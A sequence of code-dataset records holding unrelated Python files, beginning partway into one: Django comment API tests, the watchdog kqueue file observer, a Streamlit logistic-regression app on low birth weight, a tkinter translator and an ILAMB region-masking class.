comment.refresh_from_db()\n self.assertNotEqual(comment.content, 'new')\n # only update content\n before_updated_at = comment.updated_at\n before_created_at = comment.created_at\n now = timezone.now()\n response = self.user1_client.put(url, {\n 'content': 'new',\n 'user_id': self.user1.id,\n 'tweet_id': another_tweet.id,\n 'created_at': now,\n })\n self.assertEqual(response.status_code, 200)\n comment.refresh_from_db()\n self.assertEqual(comment.content, 'new')\n self.assertEqual(comment.user, self.user1)\n self.assertEqual(comment.tweet, self.tweet)\n self.assertEqual(comment.created_at, before_created_at)\n self.assertNotEqual(comment.created_at, now)\n self.assertNotEqual(comment.updated_at, before_updated_at)\n\n def test_destroy(self):\n comment = self.create_comment(self.user1, self.tweet)\n url = COMMENT_DETAIL_URL.format(comment.id)\n\n response = self.anonymous_client.delete(url)\n self.assertEqual(response.status_code, 403)\n\n response = self.user2_client.delete(url)\n self.assertEqual(response.status_code, 403)\n\n count = Comment.objects.count()\n response = self.user1_client.delete(url)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(Comment.objects.count(), count - 1)\n","repo_name":"hwpanda/social-backend","sub_path":"comments/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37024042161","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\watchdog\\observers\\kqueue.py\r\nfrom __future__ import with_statement\r\nfrom watchdog.utils import platform\r\nimport threading\r\nimport errno\r\nimport sys\r\nimport stat\r\nimport os\r\nif sys.version_info < (2, 7, 0):\r\n import select_backport as select\r\nelse:\r\n import select\r\nfrom pathtools.path import absolute_path\r\nfrom watchdog.observers.api import BaseObserver, EventEmitter, DEFAULT_OBSERVER_TIMEOUT, DEFAULT_EMITTER_TIMEOUT\r\nfrom watchdog.utils.dirsnapshot import DirectorySnapshot\r\nfrom watchdog.events import DirMovedEvent, DirDeletedEvent, DirCreatedEvent, DirModifiedEvent, FileMovedEvent, FileDeletedEvent, FileCreatedEvent, FileModifiedEvent, EVENT_TYPE_MOVED, EVENT_TYPE_DELETED, EVENT_TYPE_CREATED\r\nMAX_EVENTS = 4096\r\nO_EVTONLY = 32768\r\nif platform.is_darwin():\r\n WATCHDOG_OS_OPEN_FLAGS = O_EVTONLY\r\nelse:\r\n WATCHDOG_OS_OPEN_FLAGS = os.O_RDONLY | os.O_NONBLOCK\r\nWATCHDOG_KQ_FILTER = select.KQ_FILTER_VNODE\r\nWATCHDOG_KQ_EV_FLAGS = select.KQ_EV_ADD | select.KQ_EV_ENABLE | select.KQ_EV_CLEAR\r\nWATCHDOG_KQ_FFLAGS = select.KQ_NOTE_DELETE | select.KQ_NOTE_WRITE | select.KQ_NOTE_EXTEND | select.KQ_NOTE_ATTRIB | select.KQ_NOTE_LINK | select.KQ_NOTE_RENAME | select.KQ_NOTE_REVOKE\r\n\r\ndef is_deleted(kev):\r\n return kev.fflags & select.KQ_NOTE_DELETE\r\n\r\n\r\ndef is_modified(kev):\r\n fflags = kev.fflags\r\n return fflags & select.KQ_NOTE_EXTEND or fflags & select.KQ_NOTE_WRITE\r\n\r\n\r\ndef is_attrib_modified(kev):\r\n return kev.fflags & select.KQ_NOTE_ATTRIB\r\n\r\n\r\ndef is_renamed(kev):\r\n return kev.fflags & select.KQ_NOTE_RENAME\r\n\r\n\r\nclass KeventDescriptorSet(object):\r\n\r\n def __init__(self):\r\n self._descriptors = set()\r\n self._descriptor_for_path = dict()\r\n self._descriptor_for_fd = dict()\r\n self._kevents = list()\r\n self._lock = threading.Lock()\r\n\r\n @property\r\n def kevents(self):\r\n with self._lock:\r\n return self._kevents\r\n\r\n @property\r\n def 
paths(self):\r\n        with self._lock:\r\n            return list(self._descriptor_for_path.keys())\r\n\r\n    def get_for_fd(self, fd):\r\n        with self._lock:\r\n            return self._descriptor_for_fd[fd]\r\n\r\n    def get(self, path):\r\n        with self._lock:\r\n            path = absolute_path(path)\r\n            return self._get(path)\r\n\r\n    def __contains__(self, path):\r\n        with self._lock:\r\n            path = absolute_path(path)\r\n            return self._has_path(path)\r\n\r\n    def add(self, path, is_directory):\r\n        with self._lock:\r\n            path = absolute_path(path)\r\n            if not self._has_path(path):\r\n                self._add_descriptor(KeventDescriptor(path, is_directory))\r\n\r\n    def remove(self, path):\r\n        with self._lock:\r\n            path = absolute_path(path)\r\n            if self._has_path(path):\r\n                self._remove_descriptor(self._get(path))\r\n\r\n    def clear(self):\r\n        with self._lock:\r\n            for descriptor in self._descriptors:\r\n                descriptor.close()\r\n\r\n            self._descriptors.clear()\r\n            self._descriptor_for_fd.clear()\r\n            self._descriptor_for_path.clear()\r\n            self._kevents = []\r\n\r\n    def _get(self, path):\r\n        return self._descriptor_for_path[path]\r\n\r\n    def _has_path(self, path):\r\n        return path in self._descriptor_for_path\r\n\r\n    def _add_descriptor(self, descriptor):\r\n        self._descriptors.add(descriptor)\r\n        self._kevents.append(descriptor.kevent)\r\n        self._descriptor_for_path[descriptor.path] = descriptor\r\n        self._descriptor_for_fd[descriptor.fd] = descriptor\r\n\r\n    def _remove_descriptor(self, descriptor):\r\n        self._descriptors.remove(descriptor)\r\n        del self._descriptor_for_fd[descriptor.fd]\r\n        del self._descriptor_for_path[descriptor.path]\r\n        self._kevents.remove(descriptor.kevent)\r\n        descriptor.close()\r\n\r\n\r\nclass KeventDescriptor(object):\r\n\r\n    def __init__(self, path, is_directory):\r\n        self._path = absolute_path(path)\r\n        self._is_directory = is_directory\r\n        self._fd = os.open(path, WATCHDOG_OS_OPEN_FLAGS)\r\n        self._kev = select.kevent(self._fd, filter=WATCHDOG_KQ_FILTER, flags=WATCHDOG_KQ_EV_FLAGS, fflags=WATCHDOG_KQ_FFLAGS)\r\n\r\n    @property\r\n    def fd(self):\r\n        return self._fd\r\n\r\n    @property\r\n    def path(self):\r\n        return self._path\r\n\r\n    @property\r\n    def kevent(self):\r\n        return self._kev\r\n\r\n    @property\r\n    def is_directory(self):\r\n        return self._is_directory\r\n\r\n    def close(self):\r\n        try:\r\n            os.close(self.fd)\r\n        except OSError:\r\n            pass\r\n\r\n    @property\r\n    def key(self):\r\n        return (self.path, self.is_directory)\r\n\r\n    def __eq__(self, descriptor):\r\n        return self.key == descriptor.key\r\n\r\n    def __ne__(self, descriptor):\r\n        return self.key != descriptor.key\r\n\r\n    def __hash__(self):\r\n        return hash(self.key)\r\n\r\n    def __repr__(self):\r\n        return '<KeventDescriptor: path=%s, is_directory=%s>' % (self.path, self.is_directory)\r\n\r\n\r\nclass KqueueEmitter(EventEmitter):\r\n\r\n    def __init__(self, event_queue, watch, timeout = DEFAULT_EMITTER_TIMEOUT):\r\n        EventEmitter.__init__(self, event_queue, watch, timeout)\r\n        self._kq = select.kqueue()\r\n        self._lock = threading.RLock()\r\n        self._descriptors = KeventDescriptorSet()\r\n\r\n        def walker_callback(path, stat_info, self = self):\r\n            self._register_kevent(path, stat.S_ISDIR(stat_info.st_mode))\r\n\r\n        self._snapshot = DirectorySnapshot(watch.path, watch.is_recursive, walker_callback)\r\n\r\n    def _register_kevent(self, path, is_directory):\r\n        try:\r\n            self._descriptors.add(path, is_directory)\r\n        except OSError as e:\r\n            if e.errno == errno.ENOENT:\r\n                pass\r\n            else:\r\n                raise\r\n\r\n    def _unregister_kevent(self, path):\r\n        self._descriptors.remove(path)\r\n\r\n    def queue_event(self, event):\r\n
EventEmitter.queue_event(self, event)\r\n if event.event_type == EVENT_TYPE_CREATED:\r\n self._register_kevent(event.src_path, event.is_directory)\r\n elif event.event_type == EVENT_TYPE_MOVED:\r\n self._unregister_kevent(event.src_path)\r\n self._register_kevent(event.dest_path, event.is_directory)\r\n elif event.event_type == EVENT_TYPE_DELETED:\r\n self._unregister_kevent(event.src_path)\r\n\r\n def _queue_dirs_modified(self, dirs_modified, ref_snapshot, new_snapshot):\r\n if dirs_modified:\r\n for dir_modified in dirs_modified:\r\n self.queue_event(DirModifiedEvent(dir_modified))\r\n\r\n diff_events = new_snapshot - ref_snapshot\r\n for file_created in diff_events.files_created:\r\n self.queue_event(FileCreatedEvent(file_created))\r\n\r\n for directory_created in diff_events.dirs_created:\r\n self.queue_event(DirCreatedEvent(directory_created))\r\n\r\n def _queue_events_except_renames_and_dir_modifications(self, event_list):\r\n files_renamed = set()\r\n dirs_renamed = set()\r\n dirs_modified = set()\r\n for kev in event_list:\r\n descriptor = self._descriptors.get_for_fd(kev.ident)\r\n src_path = descriptor.path\r\n if is_deleted(kev):\r\n if descriptor.is_directory:\r\n self.queue_event(DirDeletedEvent(src_path))\r\n else:\r\n self.queue_event(FileDeletedEvent(src_path))\r\n elif is_attrib_modified(kev):\r\n if descriptor.is_directory:\r\n self.queue_event(DirModifiedEvent(src_path))\r\n else:\r\n self.queue_event(FileModifiedEvent(src_path))\r\n elif is_modified(kev):\r\n if descriptor.is_directory:\r\n dirs_modified.add(src_path)\r\n else:\r\n self.queue_event(FileModifiedEvent(src_path))\r\n elif is_renamed(kev):\r\n if descriptor.is_directory:\r\n dirs_renamed.add(src_path)\r\n else:\r\n files_renamed.add(src_path)\r\n\r\n return (files_renamed, dirs_renamed, dirs_modified)\r\n\r\n def _queue_renamed(self, src_path, is_directory, ref_snapshot, new_snapshot):\r\n try:\r\n ref_stat_info = ref_snapshot.stat_info(src_path)\r\n except KeyError:\r\n if is_directory:\r\n self.queue_event(DirCreatedEvent(src_path))\r\n self.queue_event(DirDeletedEvent(src_path))\r\n else:\r\n self.queue_event(FileCreatedEvent(src_path))\r\n self.queue_event(FileDeletedEvent(src_path))\r\n return\r\n\r\n try:\r\n dest_path = absolute_path(new_snapshot.path_for_inode(ref_stat_info.st_ino))\r\n if is_directory:\r\n event = DirMovedEvent(src_path, dest_path)\r\n if self.watch.is_recursive:\r\n for sub_event in event.sub_moved_events():\r\n self.queue_event(sub_event)\r\n\r\n self.queue_event(event)\r\n else:\r\n self.queue_event(FileMovedEvent(src_path, dest_path))\r\n except KeyError:\r\n if is_directory:\r\n self.queue_event(DirDeletedEvent(src_path))\r\n else:\r\n self.queue_event(FileDeletedEvent(src_path))\r\n\r\n def _read_events(self, timeout = None):\r\n return self._kq.control(self._descriptors.kevents, MAX_EVENTS, timeout)\r\n\r\n def queue_events(self, timeout):\r\n with self._lock:\r\n try:\r\n event_list = self._read_events(timeout)\r\n files_renamed, dirs_renamed, dirs_modified = self._queue_events_except_renames_and_dir_modifications(event_list)\r\n new_snapshot = DirectorySnapshot(self.watch.path, self.watch.is_recursive)\r\n ref_snapshot = self._snapshot\r\n self._snapshot = new_snapshot\r\n if files_renamed or dirs_renamed or dirs_modified:\r\n for src_path in files_renamed:\r\n self._queue_renamed(src_path, False, ref_snapshot, new_snapshot)\r\n\r\n for src_path in dirs_renamed:\r\n self._queue_renamed(src_path, True, ref_snapshot, new_snapshot)\r\n\r\n 
self._queue_dirs_modified(dirs_modified, ref_snapshot, new_snapshot)\r\n except OSError as e:\r\n if e.errno == errno.EBADF:\r\n pass\r\n else:\r\n raise\r\n\r\n def on_thread_stop(self):\r\n with self._lock:\r\n self._descriptors.clear()\r\n self._kq.close()\r\n\r\n\r\nclass KqueueObserver(BaseObserver):\r\n\r\n def __init__(self, timeout = DEFAULT_OBSERVER_TIMEOUT):\r\n BaseObserver.__init__(self, emitter_class=KqueueEmitter, timeout=timeout)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/watchdog/observers/kqueue.py","file_name":"kqueue.py","file_ext":"py","file_size_in_byte":10973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20135861784","text":"from problem_utils import *\nfrom operator import *\n\nclass LCMRange:\n def lcm(self, first, last):\n input_int0 = first\n input_int1 = last\n inf = 1000\n \n # The least common multiple of a group of integers is the smallest number that can be evenly divided by all the integers in the group.\n #### least_common_multiple = lambda group: smallest(integers for integers in group) for number in range(1, inf) if all(evenly(divided(number, integers), 0))\n reduce = lambda possibility: min(i for i in range(1, inf) if all(eq(mod(i, element), 0) for element in possibility))\n \n # Given two ints, first and last, find the least common multiple of all the numbers between first and last, inclusive.\n #### find(least_common_multiple(between(first, inclusive(last))))\n return(reduce(range(input_int0, inclusive(input_int1))))\n \nif __name__ == '__main__':\n first, last = 1,5\n lcmr = LCMRange()\n print(lcmr.lcm(first, last))","repo_name":"jvalansi/word2code","sub_path":"word2code/res/text&code3/LCMRange.py","file_name":"LCMRange.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"950421416","text":"import pandas as pd\nimport numpy as np \nimport os\nimport statsmodels.api as sm\nimport scipy.stats as stats\nimport math\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy.special import logit\nimport streamlit as st \nimport sklearn.metrics as metrics\n\n\ndef load_df(path,**kwargs):\n \n with open(path,'r',**kwargs) as file:\n \n result = pd.read_csv(file, sep='\\s+')\n\n return result\n\ndef data_transform(df):\n \n df_temp1 = df.rename(columns = {'4':'ID','1':'LOW','28':'AGE',\n '120':'LWT','3':'RACE',\n '1.1':'SMOKE','1.2':'PTL','0':'HT','1.3':'UI',\n '0.1':'FTV','709':'BWT'})\n \n dummies_race = pd.get_dummies(df_temp1[\"RACE\"],prefix = ['RACE'],drop_first = True)\n \n df_temp2 = pd.concat([df_temp1,dummies_race],axis = 1)\n \n \n \n df_temp3 = df_temp2.drop([\"RACE\"],axis = 1)\n \n real_df = df_temp3.rename(columns = {\"['RACE']_2\":\"RACE_2\",\"['RACE']_3\":\"RACE_3\"})\n \n return real_df\n\n\ndef odds_ratio(df,column1,column2):\n\n \n table = df.groupby(\"LOW\").sum()[[column1,column2]].values\n odds,p_value = stats.fisher_exact(table)\n \n return {\"Odds Ratio\": round(odds,2), \"P-Valor\": round(p_value,2)}\n \n \ndef stepwise_selection(X, y,initial_list=[],pvalue_in=0.15,pvalue_out = 0.20,verbose=True):\n included = list(initial_list)\n while True:\n changed=False\n # forward step\n excluded = list(set(X.columns)-set(included))\n new_pval = pd.Series(index=excluded)\n for new_column in excluded:\n model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included+[new_column]]))).fit()\n new_pval[new_column] = model.pvalues[new_column]\n best_pval = 
new_pval.min()\n        if best_pval < pvalue_in:\n            best_feature = new_pval.idxmin()\n            included.append(best_feature)\n\n            changed = True\n\n            if verbose:\n\n                print(f'Adding {best_feature} with p-value {best_pval}')\n\n        # backward step\n        model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included]))).fit()\n        # use all coefs except intercept\n        pvalues = model.pvalues.iloc[1:]\n        worst_pval = pvalues.max()  # null if pvalues is empty\n        if worst_pval > pvalue_out:\n            changed = True\n            worst_feature = pvalues.idxmax()\n            included.remove(worst_feature)\n            if verbose:\n\n                print(f'Removing {worst_feature} with p-value {worst_pval}')\n        if not changed:\n            break\n    return included\n\n\ndef model(Y, *args):\n\n    dependente = Y\n    independentes = sm.add_constant(*args)\n\n    logit_mod = sm.Logit(dependente, independentes)\n    result = logit_mod.fit(method = 'newton')\n    return result\n\n\ndef wald_test(list_coef, list_se):\n\n    values = []\n    for i, j in zip(list_coef, list_se):\n        test = round(abs(i / j), 2)\n        values.append(test)\n    pvalor = 1 - stats.norm.cdf(values, 0, 1)\n\n    for index, pvalues in enumerate(pvalor):\n\n        if pvalues < 0.05:\n\n            print(f'We reject H0 and conclude that coefficient Beta {index+1}, with W = {values[index]}, is significant, with a p-value of {round(pvalues,6)}.\\n')\n\n        else:\n\n            print(f'We do not reject H0 and conclude that coefficient Beta {index+1}, with W = {values[index]}, is not significant, with a p-value of {round(pvalues,6)}.\\n')\n\n\ndef hosmer_lemeshow_test(df, groups):\n\n    data_st = df.sort_values('predict')\n    data_st['dcl'] = pd.qcut(data_st['predict'], groups)\n\n    ys = data_st['LOW'].groupby(data_st.dcl).sum()\n    yt = data_st['LOW'].groupby(data_st.dcl).count()\n    yn = yt - ys\n\n    yps = data_st['predict'].groupby(data_st.dcl).sum()\n    ypt = data_st['predict'].groupby(data_st.dcl).count()\n    ypn = ypt - yps\n\n    hltest = ( ((ys - yps)**2 / yps) + ((yn - ypn)**2 / ypn) ).sum()\n    pvalor = 1 - stats.chi2.cdf(hltest, groups - 2)\n\n    dof = groups - 2\n    print(f'Hosmer-Lemeshow test: {hltest}, with p-value: {pvalor} and {dof} degrees of freedom')\n\n\ndef plot_probability(df):\n\n    sns.regplot(x = df['LWT'].values, y = df['LOW'],\n                logistic=True, color = 'blue')\n    plt.xlabel('Weight at the Last Menstrual Period (lbs)')\n    plt.ylabel('Probability')\n    plt.title('Logistic Regression: Probability of a baby being born with low weight')\n    plt.grid()\n    plt.show()\n\n\ndef confusion_matrix_plot(model):\n\n    sns.heatmap(model.pred_table())\n    plt.title(\"Confusion Matrix\")\n    plt.show()\n\n\ndef plot_logit(model, df):\n\n    variables = pd.DataFrame(df, columns = ['LWT', 'SMOKE', 'PTL', 'HT', 'UI', 'RACE_2', 'RACE_3'])\n    X = sm.add_constant(variables)\n    predict = model.predict(X)\n    logit_g = logit(predict)\n\n    sns.regplot(x = variables['LWT'].values, y = logit_g, color = '0.1')\n    plt.xlabel('Weight at the Last Menstrual Period (lbs)')\n    plt.ylabel('Logit')\n    plt.title('Logit of a baby being born with low weight')\n    plt.grid()\n    plt.show()\n\n\ndef residual_pearson(model, df):\n\n    observed = []\n\n    m = np.asarray(df.groupby(['LWT','LOW'])['LOW'].count().values)\n    yi = df.groupby(['LWT','LOW']).groups.keys()\n    predict = model.predict()\n    r = np.ones((len(m)))\n\n    for i, j in yi:\n        observed.append(j)\n\n    obs_2 = np.asarray(observed)\n\n    for k in range(len(m)):\n\n        r[k] = (obs_2[k] - (m[k] * predict[k]))/math.sqrt(m[k] * predict[k] * (1 - predict[k]))\n\n    Chi_2 = np.round(np.sum(r**2), 2)\n\n    chi_tab = stats.chi2.ppf(1 - .05, df = len(m) - model.df_model + 1)\n    p_valor = 1 - 
stats.chi2.cdf(Chi_2,len(m) - model.df_model + 1)\n\n print(f'Como a estatística qui-quadrado {Chi_2}, valor tabelado {round(chi_tab,2)} e o seu p-valor é {round(p_valor,7)}')\n \ndef roc_curve(model,df):\n \n variables = pd.DataFrame(df,columns = ['LWT', 'SMOKE', 'PTL', 'HT', 'UI','RACE_2','RACE_3']) \n X = sm.add_constant(variables)\n probs = model.predict(X)\n fpr,tpr,threshold = metrics.roc_curve(y,probs) \n roc_auc = metrics.auc(fpr,tpr)\n\n \n \n plt.title(\"Curva Roc\")\n plt.plot(fpr,tpr,'b',label = 'AUC = %0.2f' % roc_auc)\n plt.legend(loc = 'lower right')\n plt.plot([0,1],[0,1],'r--')\n plt.xlim([0,1])\n plt.ylim([0,1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n \n\n\nst.title('Identificando fatores de riscos associados ao nascimento de bebês com baixo peso.')\nst.text('O objetivo deste projeto é identificar os fatores de riscos que levam um bebê a nascer com baixo peso (menos que 2500 gramas). Este modelo foi construido a partir do modelo de regressão logistica. \\n'\n 'Nesse estudo foram coletados dados de 189 mulheres, em que n1 = 59 tiveram bebês que nasceram com baixo peso e n0 = 130, mulheres que tiveram bebês com peso normal.\\n\\n'\n \n 'Os dados foram coletados no Hospital “Baystate Medical Center” de Springfield, Massachusetts, Estados Unidos, no ano de 1986. No modelo construído sete variáveis foram consideradas importantes, \\n'\n 'como peso da mãe (LWT), raça (RACE), se fumou durante a gravidez (SMOKE), se tem histórico de trabalho de parto prematuro (PTL), se tem hipertensão (HT), se a mâe tem irritabilidade uterina (UI). \\n'\n 'Das variaveis mencionadas, apenas as variáveis trabalho de parto e hipertensão não foram significativas, porém, de acordo com referências pesquisadas, elas são importantes. 
A variável resposta considerada foi a variável LOW, \\n'\n 'baixo peso do bebê.')\n\n\nbase_path = os.path.dirname(os.path.abspath(__file__))\n\n#Importando dados\ndf = load_df(os.path.join(base_path,\"lowbwt.dat\"))\n\n \n\n#Dados Transformados\ndata = data_transform(df)\n\nst.subheader('Dados:')\nst.write(data.head())\n \n#Verificando se há valores ausentes\n#data.info()\n#data.isnull().sum()\n \n# Teste Odds Ratio com Raça 1 e Raça 2\nodds_ratio(data,\"RACE_2\",\"RACE_3\") \n \n#-------------------------------\n\n\n\nX = pd.DataFrame(data, columns=['AGE', 'LWT', 'SMOKE', 'PTL', 'HT', 'UI', 'FTV', 'RACE_2', 'RACE_3'])\ny = data[\"LOW\"].values\n\nstepwise_selection(X,y)\n \n#Modelo com as Váriaveis selecionadas:\ndependent_variable = data[\"LOW\"].values\nselected_variables = pd.DataFrame(data,columns = ['LWT', 'SMOKE', 'PTL', 'HT', 'UI','RACE_2','RACE_3'])\n \nmodelo = model(dependent_variable,selected_variables)\n\n#Teste Hosmer_Lemeshow: \ndata[\"predict\"] = modelo.predict()\nhosmer_lemeshow_test(data,10)\n\nlist_coef = []\n \nfor index,params in enumerate(modelo.params):\n \n if index > 0:\n list_coef.append(params)\n \nlist_se = np.sqrt([modelo.cov_params()['LWT']['LWT'],\n modelo.cov_params()['SMOKE']['SMOKE'],\n modelo.cov_params()['PTL']['PTL'],\n modelo.cov_params()['HT']['HT'],\n modelo.cov_params()['UI']['UI'],\n modelo.cov_params()['RACE_2']['RACE_2'],\n modelo.cov_params()['RACE_3']['RACE_3'] \n ]) \n \n \n#Teste de Wald\nwald_test(list_coef,list_se)\n \n#Probaility\nst.subheader('Modelo Encontrado: \\n')\nst.latex(r'''\\hat \\pi_i = {e^{-0.0306152 - 0.016050LWT + 0.908519SMOKE + 0.489231PTL + 1.856358HT + 0.747161UI + 1.314579RACE2 + 0.860976RACE3}\\over 1 + e^{-0.0306152 - 0.016050LWT + 0.908519SMOKE + 0.489231PTL + 1.856358HT + 0.747161UI + 1.314579RACE2 + 0.860976RACE3}} ''')\n\n\nst.subheader('Gráfico da Probabilidade Estimada:')\nst.pyplot(plot_probability(data))\n\n \n \nst.subheader('Matriz de Confusão:')\nst.pyplot(confusion_matrix_plot(modelo))\n\n\nst.subheader('Logito Encontrado:')\nst.latex(r'''\\hat g(x_i) = -0.0306152 - 0.016050LWT + 0.908519SMOKE + 0.489231PTL + 1.856358HT + 0.747161UI + 1.314579RACE2 + 0.860976RACE3''')\n#Intervalo de Confiança\nst.subheader('Gráfico do Logito Estimado:')\nst.pyplot(plot_logit(modelo,data))\n \n \n \n#Residuo de Pearson:\nresidual_pearson(modelo,data) \n\n\n#Curva Roc:\nst.subheader('Curva ROC:')\nst.pyplot(roc_curve(modelo,data))\n\n#Texto:\nst.text('Este aplicativo foi um trabalho final da disciplina de Análise de Dados: Regressão Logística.\\nOs dados foram obtidos no livro de HOSMER,D.; LEMESHOW, S. Applied logistic regression. 2nd ed. New York: Wiley, 2000. 
375 p.')\n\n# Streamlit sidebar\nst.sidebar.header(\"Predição\")\nName = st.sidebar.text_input(\"Digite o seu nome: \")\nLWT = st.sidebar.slider(\"Selecione o seu peso do ultimo periodo menstrual em libras\", 1, 200, 1)\nSMOKE = st.sidebar.selectbox(\"Você fuma ?\", options = ['Sim', 'Não'])\nPTL = st.sidebar.selectbox(\"Você tem histórico de trabalho de parto prematuro ?\", options = ['Sim', 'Não'])\nHT = st.sidebar.selectbox('Você tem hipertensão ?', options = ['Sim', 'Não'])\nUI = st.sidebar.selectbox(\"Você tem irritabilidade uterina ?\", options = ['Sim', 'Não'])\nRACE = st.sidebar.selectbox(\"Selecione a sua raça:\", options = ['Branca', 'Negra', 'Outra'])\n\nb_race, o_race = 0, 0\n\nif PTL == 'Sim':\n    PTL = 1\nelse:\n    PTL = 0\n\nif HT == 'Sim':\n    HT = 1\nelse:\n    HT = 0\n\n# map the selected race onto the two dummy variables\nif RACE == 'Negra':\n    b_race = 1\nelif RACE == 'Outra':\n    o_race = 1\nelse:\n    b_race, o_race = 0, 0\n\nif UI == 'Sim':\n    UI = 1\nelse:\n    UI = 0\n\nif SMOKE == 'Sim':\n    SMOKE = 1\nelse:\n    SMOKE = 0\n\nif st.sidebar.button(\"Predizer\"):\n\n    input_data = np.asarray([LWT, SMOKE, PTL, HT, UI, b_race, o_race]).reshape((1, 7))\n    details = np.c_[np.ones((1, 1)), input_data]\n    result = modelo.predict(sm.add_constant(details))\n    st.sidebar.subheader('A {} tem {}% de chance de seu filho nascer com baixo peso'.format(Name, np.round(result*100, 2)))\n\n# streamlit run proj.py\n","repo_name":"isaalvesdev/App_LogisticRegression","sub_path":"proj.py","file_name":"proj.py","file_ext":"py","file_size_in_byte":11977,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21953978896","text":"#!/usr/bin/env python\r\nfrom translate import Translator\r\nfrom tkinter import StringVar, Label, ttk, Button, Entry\r\nimport tkinter as tk\r\n\r\nmainWindow = tk.Tk()\r\nmainWindow.title(\"Multi Language Translator\")\r\n\r\ndef eng_to_other_language_translation(selected_lang, input_str):\r\n    translator = Translator(to_lang=selected_lang)\r\n    translation_str = translator.translate(input_str)\r\n    return translation_str\r\n\r\noutput_str = StringVar()\r\ninfo_label = Label(mainWindow, text=\"Enter message here:\")\r\ninfo_label.pack()\r\ninfo_label.config(pady=15)\r\n\r\ninput_entry = Entry(mainWindow,\r\n                    relief=\"raised\",\r\n                    bd=2,\r\n                    font=(\"Arial\", 15))\r\ninput_entry.pack(fill=\"x\", padx=15, pady=10)\r\n\r\ndef translate_handler():\r\n    lang = selected_lang.get()\r\n    input_str = input_entry.get()\r\n    output_str.set(eng_to_other_language_translation(lang, input_str))\r\n\r\n\r\nselected_lang = StringVar()\r\nlang_cb = ttk.Combobox(mainWindow, textvariable=selected_lang)\r\nlang_cb['state'] = 'readonly'\r\nlanguages = ['Gujarati', 'Hindi', 'German', 'Spanish', 'Chinese']\r\nlang_cb['values'] = [m for m in languages]\r\nlang_cb.set('Gujarati')\r\nlang_cb.pack()\r\n\r\ntranslate_btn = Button(mainWindow, text=\"Translate\", command=translate_handler)\r\ntranslate_btn.config(padx=43, pady=10)\r\ntranslate_btn.pack(pady=10)\r\n\r\noutput_label = Label(mainWindow, textvariable=output_str)\r\noutput_label.pack(fill=\"x\", padx=20, pady=10)\r\noutput_label.config(relief=\"raised\", bd=\"2\", height=6, font=(\"Arial\", 24))\r\n\r\nmainWindow.geometry(\"800x450\")\r\nmainWindow.resizable(False, False)\r\nmainWindow.mainloop()\r\n","repo_name":"DCDJunkie/tkinter","sub_path":"Applications/6. mult_language_translation.py","file_name":"6. 
mult_language_translation.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39255849257","text":"import logging\nimport os\nimport warnings\n\nimport numpy as np\nfrom mpi4py import MPI\nfrom netCDF4 import Dataset\n\nlogger = logging.getLogger(\"%i\" % MPI.COMM_WORLD.rank)\n\n\nclass Regions(object):\n \"\"\"A class for unifying the treatment of regions in ILAMB.\n\n This class holds a list of all regions currently registered in the\n ILAMB system via a static property of the class. It also comes\n with methods for defining additional regions by lat/lon bounds or\n by a mask specified by a netCDF4 file. A set of regions used in\n the Global Fire Emissions Database (GFED) is included by default.\n\n \"\"\"\n\n _regions = {}\n _sources = {}\n\n @property\n def regions(self):\n \"\"\"Returns a list of region identifiers.\"\"\"\n return Regions._regions.keys()\n\n def addRegionLatLonBounds(\n self, label, name, lats, lons, source=\"user-provided latlon bounds\"\n ):\n \"\"\"Add a region by lat/lon bounds.\n\n Parameters\n ----------\n label : str\n the unique region identifier (lower case, no spaces or special characters)\n name : str\n the name of the region (as will appear in the HTML pull down menu)\n lats : array-like of size 2\n the minimum and maximum latitudes defining the region on the interval (-90,90)\n lons : array-like of size 2\n the minimum and maximum longitudes defining the region on the interval (-180,180)\n source : str, optional\n a string representing the source of the region, purely cosmetic\n \"\"\"\n lat = np.hstack([[-90.0], np.asarray(lats), [90.0]])\n lon = np.hstack([[-180.0], np.asarray(lons), [180.0]])\n mask = np.asarray([[1, 1, 1], [1, 0, 1], [1, 1, 1]], dtype=bool)\n Regions._regions[label] = [name, lat, lon, mask]\n Regions._sources[label] = source\n\n def addRegionShapeFile(self, filename):\n \"\"\"Add regions found in a Shapefile.\n\n This routine will read region gemoetries from a Shapefile and\n create ILAMB regions. Shapefiles provided can be in any\n geospatial projection, however, they will all be projected to\n standard EPSG 4326 latlon projection. Routine expects the\n shapefile to provide 'label' attribute to populate attribute\n 'labels' for the region.\n\n \"\"\"\n warnings.filterwarnings(\"ignore\")\n try:\n import geopandas as gpd\n except ImportError:\n msg = \"ILAMB Regions based on shapefiles requires the rasterio and geopandas modules\"\n raise ValueError(msg)\n vregions = gpd.read_file(filename)\n # check projection of the shapefile, if not EPSG 4326, reproject to 4326\n if vregions.crs != 4326:\n logger.info(\n \"[Regions.addRegionShapeFile()] Reprojected %s from EPSG %d to EPSG 4326\"\n % (filename, vregions.crs)\n )\n vregions.to_crs(epsg=4326)\n catids = vregions.value.unique().tolist()\n catids.sort()\n regionnames = []\n for c in catids:\n catid = c\n label = vregions.label[vregions.value == c].unique()[0]\n name = label.lower()\n regionnames.append(label.lower())\n shape = vregions[vregions.value == c]\n Regions._regions[label.lower()] = [name, catid, shape]\n Regions._sources[label.lower()] = os.path.basename(filename)\n warnings.filterwarnings(\"default\")\n return regionnames\n\n def addRegionNetCDF4(self, filename):\n \"\"\"Add regions found in a netCDF4 file.\n\n This routine will search the target filename's variables for\n 2-dimensional datasets which contain indices representing\n distinct non-overlapping regions. 
